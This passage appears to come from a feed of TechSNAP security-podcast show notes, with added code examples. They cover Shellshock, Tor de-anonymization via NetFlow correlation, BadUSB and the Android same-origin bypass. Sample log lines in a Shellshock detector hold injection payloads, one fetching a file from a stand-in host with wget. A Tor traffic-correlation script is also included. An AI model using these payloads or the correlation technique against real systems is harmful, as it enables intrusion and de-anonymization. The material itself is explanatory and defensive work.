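    }


if __name__ == "__main__":
    print(demo())
```

Running demo() shows the two halves of the story: the tampered config makes the client draw the employee screen, the hardened endpoint still returns 403 for the rider account, and only the vulnerable endpoint, which trusts the echoed flag, hands over employee data.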

The post An Uber Mess | TechSNAP 205 first appeared on Jupiter Broadcasting.

Don’t Fire IT | TechSNAP 193 https://original.jupiterbroadcasting.net/74187/dont-fire-it-techsnap-193/ Thu, 18 Dec 2014 18:51:04 +0000


More and more data breaches are leading to blackmail but the stats don’t tell the whole story. We’ll explain.

Plus the latest in the Sony hack, and the wider reaction. Plus a great batch of emails & much, much more!


— Show Notes: —

Illinois Hospital being blackmailed with stolen Patient Data

  • “An Illinois hospital says someone attempted to blackmail it to stop the release of data about some of its patients.”
  • The hospital chain received an anonymous email asking for a substantial amount of money in order to prevent the release of patient data. A sample of the data was included in the email as proof
  • “The hospital says it immediately notified law enforcement agencies.”
  • “An investigation discovered the data relates to patients who visited Clay County Hospital clinics on or before February 2012. A hospital representative declined to disclose how many people are involved but said the data is limited to their names, addresses, Social Security numbers and dates of birth. No medical information was compromised in the breach”
  • “The hospital believes the data has not been released so far. It didn’t disclose how the data was obtained but said an audit by an outside expert concluded the hospital hadn’t been hacked.”
  • The age of the data suggests that the compromise may have involved backups and/or cold storage
  • It is not clear whether the hospital stores the older data itself, or relies on a third-party provider that may have been compromised
  • “A recent report by the Identity Theft Report Center found that by early December there had been 304 breaches so far this year in the U.S. healthcare sector. That’s 42 percent of the 720 breaches reported across the country. But, in part because of the massive breaches at major retailers, the entire healthcare sector only accounted for 9.7 percent of all records compromised in reported breaches so far in 2014.”

Sony cancels the release of “The Interview” – plays the victim


Tor Vibrations | TechSNAP 190 https://original.jupiterbroadcasting.net/72562/tor-vibrations-techsnap-190/ Thu, 27 Nov 2014 11:52:56 +0000


We’ll tell you about the VMware flaw so bad, the solution is to just turn the service off & we now have more details on a major Windows flaw.

Plus new research discovers that up to 81% of Tor users could be de-anonymized, a great batch of your networking questions & much, much more!


— Show Notes: —

Why the VMWare TPS flaw is a big deal

  • VMware recently disclosed a vulnerability in its line of virtualization products (vSphere, ESXi, etc.)
  • VMware has a feature called TPS (“Transparent Page Sharing”), which provides deduplication of memory between virtual machines
  • When two or more virtual machines hold an identical 4 KB page of memory, only one physical page on the host is actually used; each VM’s copy is mapped read-only to it and copied on write
  • VMs may have many common blocks if they are running the same OS and Applications, especially if the VMs are clones of each other
  • “Experimental implementations show that using this method, it is possible to run over 50 Windows XP VMs with 1GB of RAM each on a physical machine with just 16GB of RAM”
  • VMWare Whitepapers of TPS for ESXi 3 and vSphere 5
  • The TPS feature is not new, it has shipped in VMWare since 2006, and is on by default
  • “Why is this a big deal? Because a virtualized architecture demands VM isolation, this is the most important security requirement for virtualization. Each VM guest running on a host must not be allowed in any way to access another VM guest. They must be kept in separate locked rooms with only the hypervisor possessing the keys to access all of them”
  • “VMware appears to be down-playing it as it obviously exposes a chink in their virtual armor, they have issued a KB article describing the vulnerability and giving guidance on how customers can disable TPS on their hosts. VMware doesn’t name the specific source that found the vulnerability in the KB article, they simply refer to it as “an academic paper””
  • THE “Academic Paper” — Wait a minute! A fast, Cross-VM attack on AES
  • “This work exploits resource sharing in virtualization software to build a powerful cache-based attack on AES. We demonstrate the vulnerability by mounting Cross-VM Flush+Reload cache attacks in VMware VMs to recover the AES keys of OpenSSL 1.0.1 running inside the victim VM. Furthermore, the attack works in a realistic setting where different VMs are located on separate cores. The modified flush+reload attack we present, takes only in the order of seconds to minutes to succeed in a cross-VM setting. Therefore long term co-location, as required by other fine grain attacks in the literature, are not needed. The results of this study show that there is a great security risk to OpenSSL AES implementation running on VMware cloud services when the deduplication is not disabled.”
  • The paper describes a technique in which an attacker with a VM on the same physical host, even one scheduled on a different CPU core, uses the deduplicated pages of the OpenSSL library as a shared cache side channel (Flush+Reload against the AES lookup tables) to recover AES keys in use inside a victim VM, for example a web server running Apache+OpenSSL
  • With a TLS session’s AES key the attacker can decrypt that session’s traffic; the same Flush+Reload primitive has been used against RSA private-key operations in other work, which would let an attacker impersonate the site and phish or otherwise extract sensitive information from end users
  • “All versions of vSphere back to VI3 are vulnerable to the exploit but VMware is only patching the 5.x versions of vSphere as the 4.x versions are no longer officially supported as of May 2014”. “Note these patches only disable TPS which is currently enabled by default, they do nothing to fix the vulnerability, it will most likely take VMware some time to figure out how to make TPS work in a way that cannot be exploited”

WinShock – What that Microsoft SChannel vulnerability was

  • SChannel is Microsoft’s TLS/SSL implementation, the Windows counterpart of OpenSSL. “SChannel is used by anything leveraging built-in SSL and TLS this includes IIS, Active Directory, OWA, Exchange, Internet Explorer, and Windows Update.”
  • The vulnerability allows remote code execution, so it is especially severe, and users should patch immediately if they have not already done so
  • An attacker can send specially crafted packets that are not properly validated, and the victim machine may end up executing attacker-supplied code, giving the attacker full control of the machine
  • Rapid7 Blog: Is MS14-066 another Red alert?
  • Rapid7 takes pains to clarify that this is not on the same level as Heartbleed, Shellshock, Poodle, or other recent vulnerabilities of that scale, mostly because this was privately disclosed to Microsoft, and is not being actively exploited in the wild
  • No one knows the details of the problem yet, and there are no proof-of-concept exploits
  • “Details surrounding the vulnerability are vague, but Microsoft has indicated that there are no known exploits in the wild and the development of exploit code will be challenging. This vulnerability is reported to affect all Windows servers and clients, and while it’s unlikely to be exploited today, it should be patched as soon as possible given the possibility of remote code execution.”

New research discovers that up to 81% of tor users could be de-anonymized by new traffic analysis techniques

  • “Research undertaken between 2008 and 2014 suggests that more than 81% of Tor clients can be ‘de-anonymised’ – their originating IP addresses revealed – by exploiting the ‘Netflow’ technology that Cisco has built into its router protocols, and similar traffic analysis software running by default in the hardware of other manufacturers.”
  • “The technique depends on injecting a repeating traffic pattern – such as HTML files, the same kind of traffic of which most Tor browsing consists – into the TCP connection that it sees originating in the target exit node, and then comparing the server’s exit traffic for the Tor clients, as derived from the router’s flow records, to facilitate client identification.”
  • “To achieve acceptable quality of service, [Tor attempts] to preserve packet interarrival characteristics, such as inter-packet delay. Consequently, a powerful adversary can mount traffic analysis attacks by observing similar traffic patterns at various points”
  • “Traffic analysis of this kind does not involve the enormous expense and infrastructural effort that the NSA put into their FoxAcid Tor redirects, but it benefits from running one or more high-bandwidth, high-performance, high-uptime Tor relays”
  • The technique involves getting the user to download a file large enough that the transfer takes a few minutes, during which the flow of data can be modulated and observed (this could be as easy as injecting an oversized image into a website, where the user does not see it)
  • By having the server that is sending the image modulate the bandwidth of the TCP connection, shifting every 20 seconds between 1 Mbit/s (about the most you would expect to get over Tor), 50 kbit/s, 300 kbit/s and then 100 kbit/s, it created a traffic pattern unique enough, and preserved by Tor, that the same pattern could be observed at the entry node the Tor user was connected to
  • By collecting NetFlow-type data (start and end time, source and destination IP, number of packets, number of bytes) at the source (or exit node) and at the entry node (or a router in front of the entry node or the end user), and correlating the two, the researchers were able to identify the real IP address of the Tor user who connected to their server
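The correlation step described above, as an added example that is not the researchers’ code: the flow records, the entry-relay address and the client addresses are all synthetic, and the four rates switched every 20 seconds are the ones from the talk. The server-side schedule is turned into expected bytes per 20-second bucket, the entry-side records are re-gridded into the same buckets per client, and each client is scored with a Pearson correlation against the injected pattern.

```python
"""NetFlow-style correlation of an injected bandwidth pattern.

Added example, not the researchers' code. The flow records and client
addresses are synthetic; the four rates (1 Mbit/s, 50, 300 and 100 kbit/s,
switched every 20 seconds) are the ones described in the show notes.
"""
import random
from statistics import mean, pstdev

STEP_SECONDS = 20
PATTERN_KBIT = [1000, 50, 300, 100]  # the server's 20-second modulation schedule
ENTRY_NODE = "198.51.100.7"          # constructed address for the entry relay


def bytes_per_bucket(rates_kbit, step=STEP_SECONDS):
    """Bytes sent in each 20-second bucket at the given rates (kbit/s)."""
    return [int(rate * 1000 / 8 * step) for rate in rates_kbit]


def flow_records(client_ip, per_bucket, rng, jitter=0.10, t0=0):
    """Emit one NetFlow-like record per bucket for entry-node -> client traffic.

    Real exporters cut records on flow expiry rather than on a fixed grid;
    bucketize() re-grids them, so exact record boundaries do not matter.
    The multiplicative jitter stands in for Tor's own timing noise.
    """
    records = []
    for i, b in enumerate(per_bucket):
        noisy = int(b * rng.uniform(1 - jitter, 1 + jitter))
        records.append({
            "start": t0 + i * STEP_SECONDS, "end": t0 + (i + 1) * STEP_SECONDS,
            "src": ENTRY_NODE, "dst": client_ip,
            "packets": max(1, noisy // 1400), "bytes": noisy,
        })
    return records


def bucketize(records, step=STEP_SECONDS):
    """Sum bytes per (destination, time bucket)."""
    totals = {}
    for r in records:
        key = (r["dst"], r["start"] // step)
        totals[key] = totals.get(key, 0) + r["bytes"]
    return totals


def pearson(xs, ys):
    """Pearson correlation of two equal-length series (0.0 if either is flat)."""
    mx, my, sx, sy = mean(xs), mean(ys), pstdev(xs), pstdev(ys)
    if sx == 0 or sy == 0:
        return 0.0
    return sum((x - mx) * (y - my) for x, y in zip(xs, ys)) / (len(xs) * sx * sy)


def correlate_clients(entry_records, injected, clients):
    """Score each client seen at the entry side against the injected pattern."""
    totals = bucketize(entry_records)
    n = len(injected)
    return {ip: pearson(injected, [totals.get((ip, i), 0) for i in range(n)])
            for ip in clients}


def demo(seed=7):
    """One target following the modulation, three bystanders at random rates."""
    rng = random.Random(seed)
    injected = bytes_per_bucket(PATTERN_KBIT * 3)  # four minutes of modulation
    target, others = "192.0.2.10", ["192.0.2.11", "192.0.2.12", "192.0.2.13"]
    records = flow_records(target, injected, rng)
    for ip in others:
        rates = [rng.uniform(50, 1000) for _ in injected]
        records += flow_records(ip, bytes_per_bucket(rates), rng)
    scores = correlate_clients(records, injected, [target] + others)
    return max(scores, key=scores.get), scores


if __name__ == "__main__":
    print(demo())
```

The defence implication follows directly from the code: the attack needs only coarse flow summaries on both ends, so anything that pads or reshapes traffic per bucket (or keeps downloads short) reduces the correlation, while encryption alone does nothing against it.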

Belkin Heartbeat Stops | TechSNAP 183 https://original.jupiterbroadcasting.net/68917/belkin-heartbeat-stops-techsnap-183/ Thu, 09 Oct 2014 18:05:41 +0000


The Belkin router apocalypse takes users offline all over the world, Infected ATMs spit out money on cue, plus isolating your network, a great batch of your questions & much, much more!


— Show Notes: —

Belkin router apocalypse, worldwide outage of almost all Belkin routers

  • “Starting approximately midnight on October 7, Belkin began experiencing an issue with a service configured in certain Belkin router models that causes a failure when it checks for general network connectivity by pinging a site hosted by Belkin.”
  • It seems Belkin routers check to see if “the internet is up” by pinging or connecting to heartbeat.belkin.com. When this service went down, all of those routers decided the internet was ‘down’, and stopped letting customers use the Internet, despite the fact that the rest of the Internet was fine
  • “One of our cloud services associated with maintaining router operations was negatively impacted by a change made in our data center that caused a false denial of service. Normal operations were restored by 3PM PST, but some users might still need to reset their router and/or cable modem to regain connectivity. Moving forward, we will continue to monitor, improve and validate the system to ensure our routers continue to work properly in the event connectivity to our cloud environment is not available. “
  • The fact that the routers rely on only a single signal, a response from heartbeat.belkin.com, to determine if the internet is working, seems wrong.
  • Even so, it doesn’t explain why the routers ‘give up’ and stop users accessing the Internet
  • It appears this has to do with the DNS resolver in the router, which stops attempting to resolve addresses when it cannot reach the Belkin site. Users who manually changed their DNS servers to Google Public DNS or OpenDNS had their service restored
  • What if the Belkin site goes down? (Like it did). What if there is a routing or transit issue? What if access to the Belkin site is blocked in your country?
  • “If your service has not yet been restored, please unplug your router and plug it back in after waiting 1 minute. Wait 5 more minutes and the router should reconnect.”
  • There were rumours that this issue was caused by a firmware update. Belkin denies this, although it is not clear if they had pushed a firmware update around the same time or not
  • Interesting: Apparently Belkin’s call center got a high volume of calls. How many users call their Router manufacturer when they have an issue, rather than their ISP? My Cisco router/modem only had my ISPs phone number on it.
  • Belkin Status Page
  • Belkin Community Forums
  • Additional Coverage: Internet Storm Center

Infected ATMs spit out money on cue, without debiting anyone’s bank account

  • “What do you need in order to withdraw cash from an ATM?”
  • First, you need to have a debit or credit card, which acts as a key to your bank account
  • Second, you must know the PIN code associated with the card; otherwise, the bank wouldn’t approve the transaction.
  • Finally, you need to have some money in your account that you can withdraw.
  • Or, you just need a bootable CD
  • “However, hackers do things differently: they don’t need cards, PIN codes or bank accounts to get money. In reality, all they need is an ATM with some cash in it and a special piece of software.”
  • “criminals were somehow able to physically access the ATMs so that they could install the malware via a bootable CD on an embedded Windows machine”
  • “The trojan that was used had complex abilities. First, when activated inside of the ATM, it had the ability to turn off the McAfee Solidcore AV software so that it could do its job with ease”
  • “Second, to avoid accidental detection, Tyupkin trojan had the ability to stay in a standby mode for an entire week and activate only Sunday and Monday nights.”
  • “Third, it had the ability to disable the local network in the case of an emergency, so that the bank could not remotely connect to the ATM to check on what was happening with it.”
  • “All an attacker has to do is merely approach an infected ATM and enter a special PIN code in order to access the secret menu that will allow him to make cash withdrawals or control the trojan (for example, to delete it).”
  • “To make a withdrawal the person has to know the appropriate commands, as well as a special formula that will calculate a session key — some kind of a two-factor authentication. If both codes are correct, then a second menu will appear that allows the criminal to choose the cassette number and make a withdrawal.”
  • “Although one can only dispense 40 banknotes per transaction, it’s possible to dispense any amount of money by simply performing the actions several times over.”

Pair arrested for exploiting flaw in Casino slot machines

  • John Kane, a gambling addict, and an accomplice, Andre Nestor, exploited a bug in Game King video poker slot machines
  • “It turned out the Game King’s endless versatility was also its fatal flaw. In addition to different game variants, the machine lets you choose the base level of your wagers: At the low-limit Fremont machines, you could select six different denomination levels, from 1 cent to 50 cents a credit”
  • “The key to the glitch was that under just the right circumstances, you could switch denomination levels retroactively. That meant you could play at 1 cent per credit for hours, losing pocket change, until you finally got a good hand—like four aces or a royal flush. Then you could change to 50 cents a credit and fool the machine into re-awarding your payout at the new, higher denomination. “
  • “Performing that trick consistently wasn’t easy—it involved a complicated misdirection that left the Game King’s internal variables in a state of confusion. But after seven hours rooted to their seats, Kane and Nestor boiled it down to a step-by-step recipe that would work every time. “
  • It turns out John Kane was very familiar with the slot machine in question:
  • “he blew half a million dollars in 2006 alone—a pace that earned him enough Player’s Club points to pay for his own Game King to play at his home on the outskirts of Vegas, along with technicians to service it. (The machine was just for fun—it didn’t pay jackpots.)“ He’s played more than anyone else in the United States, says his lawyer, Andrew Leavitt. I’m not exaggerating or embellishing. It’s an addiction.”
  • Game King 5.0 was released in 2002, however it contained a series of subtle errors in program number G0001640 that evaded laboratory testing and source code review.
  • “The bug survived like a cockroach for the next seven years. It passed into new revisions, one after another, ultimately infecting 99 different programs installed in thousands of IGT machines around the world. As far as anyone knows, it went completely undetected until late April 2009, when John Kane was playing at a row of four low-limit Game Kings outside the entrance to a Chinese fast food joint”
  • “Kane had some idea of how the glitch operated but hadn’t been able to reliably reproduce it. Working together, the two men began trying different combinations of play, game types, and bet levels, sounding out the bug like bats in the dark.”
  • The pair eventually sorted out the details, and managed to get more than $750,000 out of various slot machines before being arrested

Xen Gets bashed | TechSNAP 182 https://original.jupiterbroadcasting.net/68177/xen-gets-bashed-techsnap-182/ Thu, 02 Oct 2014 21:05:42 +0000


Recent major flaws found in in critical open source software have sent the Internet into a panic. From Shellshock to Xen we’ll discuss how these vulnerabilities can be chained together to own a box.

Plus how secure are VLANs, a big batch of your questions, our answers, and much much more!


— Show Notes: —

Bash plus Xen bug send the entire internet scrambling

  • A critical flaw was discovered in the bash shell, the default system shell on most Linux distributions as well as OS X.
  • The flaw was in the parsing of environment variables. Bash lets a parent process pass shell functions to a child through the environment: a variable whose value starts with “() {” is imported as a function definition. The bug was that bash kept parsing past the function body, so any commands after the closing brace (separated by the semicolon that normally chains commands together) were executed when the shell started, before it ran anything else
  • Many people are not aware that CGI passes the original request data, as well as all HTTP headers, to scripts via environment variables
  • After those using bash CGI scripts ran around like chickens with their heads cut off, others came to realize that even if the CGI scripts are actually Perl or something else, if they happen to fork a shell via system() or similar to do something, that shell inherits those environment variables and is vulnerable
  • As more people spent brain cycles thinking of creative ways to exploit this bug, it was realized that even qmail was vulnerable in some cases: if a user has a .qmail file or similar that forwards their email via a pipe, that command is executed via the system shell, with environment variables containing the email headers, including From, To, Subject etc.
  • While FreeBSD does not ship with bash by default, it is a common dependency of most desktop environments, including GNOME and KDE. PC-BSD also makes bash available to users to make life easier for Linux switchers, and FreeNAS uses bash for its interactive web shell for the same reason. While not vulnerable in most cases, all have been updated to ensure that some new creative way to exploit the bug does not crop up
  • Apparently the DHCP client in Mac OS X also uses bash, and a malicious DHCP server could exploit the flaw
  • The flaw also affects a number of VMware products
  • OpenVPN and many other software packages have also been found to be vulnerable
  • The version of bash on your system can be tested easily with this one-liner:
    env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
  • This prints “this is a test”; if bash has not yet been patched, it will first print “vulnerable”
  • ArsTechnica: Bug in bash shell creates big security hole on anything with linux in it
  • Concern over bash bug grows as it is actively exploited in the wild
  • First bash patch doesn’t solve problem, second patch rushed out to resolve issue
  • Now that people are looking, even more bugs in bash found and fixed
  • Shellshock fixes result in another round of patches as attacks get more clever
  • Apple releases patch for shellshock bug
  • There was also a critical update to NSS (the Mozilla cryptographic library), which was not properly validating SSL certificates
  • The other big patch this week was for Xen
  • It was announced by a number of public cloud providers, including Amazon and Rackspace, that some virtual server host machines would need to be rebooted to install security fixes, resulting in downtime for 10% of Amazon instances
  • It is not clear why this could not be resolved by live migrations
  • All versions of Xen since 4.1 until this patch are vulnerable. The flaw is only exploitable when running fully virtualized guests (HVM mode, uses the processor virtualization features), and can not be exploited by virtual machines running in the older paravirtualization mode. Xen on ARM is not affected
  • Xen Security Advisory
  • Amazon Blog Post #1
  • Amazon Blog Post #2
  • Rackspace Blog Post
  • Additional Coverage: eweek
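Two practical pieces follow from the CGI and system() discussion above: how a request header becomes an environment variable that a forked bash will inherit, and how to spot exploitation attempts after the fact. The following is an added example, not code from the show notes or from any of the linked articles. The request, headers and access-log lines are constructed (the log lines use Apache’s combined format); the regex flags the “() { … };” function-export shape followed by trailing text, and the scanner URL-decodes each field first so that an encoded payload in the query string is not missed.

```python
"""How a request reaches bash through CGI, and a detector for Shellshock attempts.

Added example, not from the show notes. The request, headers and log lines
are constructed; the log format is Apache's combined format.
"""
import re
import urllib.parse


def cgi_environment(method, path, query, headers):
    """Mimic the CGI/1.1 mapping a web server performs before exec()ing a
    script: each request header becomes HTTP_<NAME>. Any bash the script
    (or a system() call it makes) starts inherits all of these."""
    env = {"REQUEST_METHOD": method, "SCRIPT_NAME": path, "QUERY_STRING": query}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


# An exported-function definition "() { ... }" followed by ";" and more text.
# Unpatched bash executed whatever followed the closing brace at startup.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")


def is_shellshock_payload(value):
    """True if the string looks like a function export with trailing commands."""
    return bool(SHELLSHOCK_RE.search(value))


def exposed_env_vars(env):
    """Environment variables that would trigger the bug in an unpatched bash."""
    return sorted(k for k, v in env.items() if is_shellshock_payload(v))


COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed access-log lines: two probes from one source, one normal hit.
LOG_LINES = [
    '203.0.113.5 - - [25/Sep/2014:10:21:07 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "-" "() { :;}; /bin/bash -c \'wget http://203.0.113.99/x -O /tmp/x\'"',
    '198.51.100.22 - - [25/Sep/2014:10:22:11 +0000] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [25/Sep/2014:10:23:40 +0000] '
    '"GET /cgi-bin/status?x=%28%29%20%7B%20%3A%3B%7D%3B%20id HTTP/1.1" '
    '200 512 "() { :; }; echo pwned" "curl/7.30"',
]


def scan_log(lines):
    """Return (source ip, field) for each line carrying a Shellshock payload.

    The request line, referer and user-agent are checked in that order and
    only the first hit per line is reported; each field is URL-decoded first
    so an encoded payload in the query string is caught too."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue
        for field in ("req", "ref", "ua"):
            if is_shellshock_payload(urllib.parse.unquote(m.group(field))):
                hits.append((m.group("ip"), field))
                break
    return hits


if __name__ == "__main__":
    print(scan_log(LOG_LINES))
```

The regex is deliberately loose (any “() { … };” shape) because the attacker controls everything after the brace; tune it on your own logs, and remember that headers other than User-Agent and Referer (Cookie, Host, custom headers) land in the environment the same way, so a full detector should look at every header the server logs.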

Cox Communications takes the privacy of its customers seriously, kind of

  • A female employee of Cox Communications (a large US ISP) was socially engineered into giving up her username and password
  • These credentials were then used to access the private data of Cox Customers
  • The attacker apparently only stole data about 52 customers, one of which was Brian Krebs
  • This makes it sound like a targeted attack, or at least an attack by someone who is (or is not) a fan of Brian Krebs
  • It appears that the Cox internal customer database can be accessed directly from the internet, with only a username and password
  • Cox says they use two factor authentication “in some cases”, and plan to expand the use of 2FA in the wake of this breach
  • Cox being able to quickly determine exactly how many customers’ data was compromised suggests they at least have some form of auditing in place, to leave a trail describing what data was accessed
  • Brian points out: “This sad state of affairs is likely the same across multiple companies that claim to be protecting your personal and financial data. In my opinion, any company — particularly one in the ISP business — that isn’t using more than a username and a password to protect their customers’ personal information should be publicly shamed.” “Unfortunately, most companies will not proactively take steps to safeguard this information until they are forced to do so — usually in response to a data breach. Barring any pressure from Congress to find proactive ways to avoid breaches like this one, companies will continue to guarantee the security and privacy of their customers’ records, one breach at a time.”

Other researchers recreate the BadUSB exploit and release the code on GitHub

  • The “BadUSB” research was originally done by Karsten Nohl and Jakob Lell, at SR Labs in Germany.
  • Presented at BlackHat, it described being able to reprogram the firmware of USB devices to perform other functions, such as a USB memory stick that presented itself to the computer as a keyboard, and typed out commands once plugged in, allowing it to compromise the computer and exfiltrate data
  • Brandon Wilson and Adam Caudill were doing their own work in this space, and when they heard about the talk at BlackHat, decided to accelerate their own work
  • They have now posted their code on Github
  • “The problem is that Nohl and Lell—and Caudill and Wilson—have not exploited vulnerabilities in USB. They’re just taking advantage of weaknesses in the manner in which USBs are supposed to behave“
  • “At Derby Con, they were able to demonstrate their attack with the device pretending to be a keyboard that typed out a predetermined script once it was plugged into the host computer. They also showed another demo where they had a hidden partition on a flash drive that was not detected by the host PC“
  • “It’s undetectable while it’s happening,” Wilson said. “The PC has no way of determining the difference. The way a PC determines the type of device all happens through the USB and code on the other device. Our ability to control that code means you cannot trust anything a USB device tells you.”
  • The way around this issue would be for device manufacturers to implement code signing
  • The existing firmware would only allow itself to be updated if the new firmware was signed by the manufacturer, preventing a malicious user from overwriting the good firmware with ‘bad’ firmware
  • Users could obviously still build their own devices specifically to carry evil firmware, but signing would prevent the case where an attacker modifies your own device to work against you
  • At the same time, many users might argue against losing control over their device, and no longer being able to update the firmware if they wish
  • The real solution may be for Operating Systems and users to evolve to no longer trust random USB devices, and instead allow the user to decide if they trust the device, possibly something similar to mobile apps, where the OS tells the user what functionality the device is trying to present
  • You might choose to not trust that USB memstick that is also attempting to present a network adapter, in order to override your DHCP settings and make your system use a set of rogue DNS servers
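The “tell the user what the device is presenting” idea above can be made concrete from the interface descriptors alone, since that is all the host has to go on. The following is an added example, not the SR Labs or Caudill/Wilson code: the device records are constructed (on Linux the same class/subclass/protocol triples come from sysfs or lsusb -v), a small allow-list says what a known vendor:product is expected to present, and composite devices that combine storage with a keyboard or a network adapter are flagged. The rendered rule strings follow USBGuard’s syntax, which is the existing Linux tool for enforcing exactly this kind of policy.

```python
"""Assess a USB device by the interfaces it actually presents.

Added example, not the SR Labs or Caudill/Wilson code. Device records are
constructed; on Linux the same class/subclass/protocol triples come from
/sys/bus/usb/devices/*/bInterfaceClass (and friends) or `lsusb -v`, and
the rule strings follow USBGuard's syntax.
"""

# USB-IF interface class codes.
CDC_CONTROL, HID, MASS_STORAGE, HUB, CDC_DATA, WIRELESS = 0x02, 0x03, 0x08, 0x09, 0x0A, 0xE0
CLASS_NAMES = {CDC_CONTROL: "cdc-control", HID: "hid", MASS_STORAGE: "mass-storage",
               HUB: "hub", CDC_DATA: "cdc-data", WIRELESS: "wireless"}
NETWORK_CLASSES = {CDC_CONTROL, CDC_DATA, WIRELESS}

# Allow-list: what each known vendor:product is expected to present (constructed ids).
EXPECTED = {("0781", "5567"): {MASS_STORAGE}}


def interface_classes(device):
    """Set of interface class codes the device enumerated with."""
    return {iface["class"] for iface in device["interfaces"]}


def assess(device, expected=EXPECTED):
    """Return ("allow" | "block", findings) for one enumerated device."""
    classes = interface_classes(device)
    key = (device["vendor"], device["product"])
    findings = []
    if key in expected and not classes <= expected[key]:
        extra = sorted(CLASS_NAMES.get(c, hex(c)) for c in classes - expected[key])
        findings.append("interfaces beyond the allow-list: " + ", ".join(extra))
    if MASS_STORAGE in classes and HID in classes:
        findings.append("storage device that also presents a keyboard or mouse")
    if MASS_STORAGE in classes and classes & NETWORK_CLASSES:
        findings.append("storage device that also presents a network adapter")
    return ("block" if findings else "allow"), findings


def usbguard_rule(device, decision):
    """Render the decision as a USBGuard rule pinned to the observed interface set."""
    triples = " ".join("{:02x}:{:02x}:{:02x}".format(i["class"], i["subclass"], i["protocol"])
                       for i in device["interfaces"])
    return "{} id {}:{} with-interface equals {{ {} }}".format(
        decision, device["vendor"], device["product"], triples)


# Constructed devices: a plain flash drive, the same drive after a BadUSB
# reflash (storage plus a boot-protocol keyboard), and a USB-Ethernet adapter.
FLASH_DRIVE = {"vendor": "0781", "product": "5567",
               "interfaces": [{"class": MASS_STORAGE, "subclass": 0x06, "protocol": 0x50}]}
BAD_DRIVE = {"vendor": "0781", "product": "5567",
             "interfaces": [{"class": MASS_STORAGE, "subclass": 0x06, "protocol": 0x50},
                            {"class": HID, "subclass": 0x01, "protocol": 0x01}]}
ETHERNET = {"vendor": "0b95", "product": "1790",
            "interfaces": [{"class": CDC_CONTROL, "subclass": 0x06, "protocol": 0x00},
                           {"class": CDC_DATA, "subclass": 0x00, "protocol": 0x00}]}


def demo():
    """Decision per constructed device."""
    return {name: assess(dev)[0] for name, dev in
            [("flash", FLASH_DRIVE), ("bad", BAD_DRIVE), ("ethernet", ETHERNET)]}


if __name__ == "__main__":
    for name, dev in [("flash", FLASH_DRIVE), ("bad", BAD_DRIVE), ("ethernet", ETHERNET)]:
        decision, findings = assess(dev)
        print(name, decision, findings, usbguard_rule(dev, decision), sep="\n  ")
```

The important caveat is the one Wilson makes: the vendor and product ids come from the same reprogrammable firmware as the interface list, so an allow-list keyed on ids only catches a device that has changed its shape, not one that was malicious from the start. Pinning the rule to the full interface set at least means a stick that later grows a keyboard interface no longer matches its own allow rule.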

Bait and Phish | TechSNAP 181 https://original.jupiterbroadcasting.net/67657/bait-and-phish-techsnap-181/ Thu, 25 Sep 2014 11:21:20 +0000


— Show Notes: —

Operation Harkonnen, a 12 year long intrusion to over 300 businesses

  • “From 2002 a German cybercrime network performed numerous targeted penetrations to over 300 organizations, including tier one commercial companies, government institutions, research laboratories and critical infrastructure facilities in the German speaking countries. The attackers planted Trojans in specific workstations in the organizations, gained access to sensitive confidential documents and information and silently exfiltrating them to the organizations who ordered the attack”
  • “Once embedded in the system the files started to send data from the target computer to an external domain. The analysis revealed the domain was registered by a UK company, with the exact address and contact details of 833 other companies, most of which are already dissolved”
  • “The British relatively tolerant requirements to purchasing SSL security certificates were exploited by the network to create pseudo legitimate Internet service names and to use them to camouflage their fraudulent activity”
  • Specifically, it is quite easy to establish a new company in England
  • It is estimated that the attackers spent as much as $150,000 establishing fake companies, and arming them with domains and SSL certificates in order to make their spear-phishing campaign appear more legitimate
  • “The discovery happened at a leading, 30 year old, 300 employees’ German organization that holds extremely sensitive information with a strategic value to many adverse organizations and countries. The organizational network contains 5 domains with complex architecture of multiple network segments and sites, connected through VPN.“
  • Additional Coverage: TheHackerNews

Researcher finds same-origin-policy bypass for Android browser, allows attacker to read your browser tabs

  • Android versions before 4.4 (75% of all current Android phones) are vulnerable
  • Tracked as CVE-2014-6041, it was disclosed on September 1, 2014 by Rafay Baloch on his blog.
  • By malforming a javascript: URL with a prepended null byte, an attacker can bypass the Android Open Source Platform (AOSP) Browser’s Same-Origin Policy (SOP) browser security control.
  • What this means is, any arbitrary website (say, one controlled by a spammer or a spy) can peek into the contents of any other web page.
  • The attacker could scrape your e-mail data and see what your browser sees.
  • Or snag a copy of your session cookie and hijack your session completely, and read and write webmail on your behalf.
  • As part of its attempts to gain more control over Android, Google has discontinued the AOSP Browser.
  • Android Browser used to be the default browser on Android, but this changed in Android 4.2, when Google switched to Chrome.
  • The core parts of Android Browser were still used to power embedded Web view controls within applications; this changed in Android 4.4, when it switched to a Chromium-based browser engine.
  • Users of Android 4.0 and up can avoid much of the exposure by switching to Chrome, Firefox, or Opera, none of which should use the broken code.
  • Update: Google has offered the following statement:

We have reviewed this report and Android users running Chrome as their browser, or those who are on Android 4.4+ are not affected. For earlier versions of Android, we have already released patches (1, 2) to AOSP.
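The bug class behind a null-byte scheme bypass, as an added example (not the AOSP Browser’s code): a scheme check on the raw string disagrees with how the URL is canonicalised before it is acted on, so a leading NUL defeats the check, beside a check that canonicalises first. The function names and the exact stripping rules are assumptions for this illustration, not a description of where the AOSP bug sat.

```javascript
// Added example (not from the episode or the AOSP code): the bug class
// behind this SOP bypass, a scheme check that compares the raw string while
// the component that later acts on the URL strips leading control
// characters such as a null byte first. Both gates are constructed
// illustrations, not the browser's actual code.

// Naive gate: asks "does this start with javascript:" on the raw string.
// "\u0000javascript:alert(1)" slips past because of the leading NUL.
function naiveIsScriptUrl(url) {
  return url.toLowerCase().startsWith("javascript:");
}

// Hardened gate: canonicalise exactly as the consumer would before deciding.
// Leading/trailing C0 controls, DEL and space are removed and tab/newline
// inside the string are dropped (the WHATWG URL parser does the same), then
// the scheme is compared case-insensitively.
function canonicalScheme(url) {
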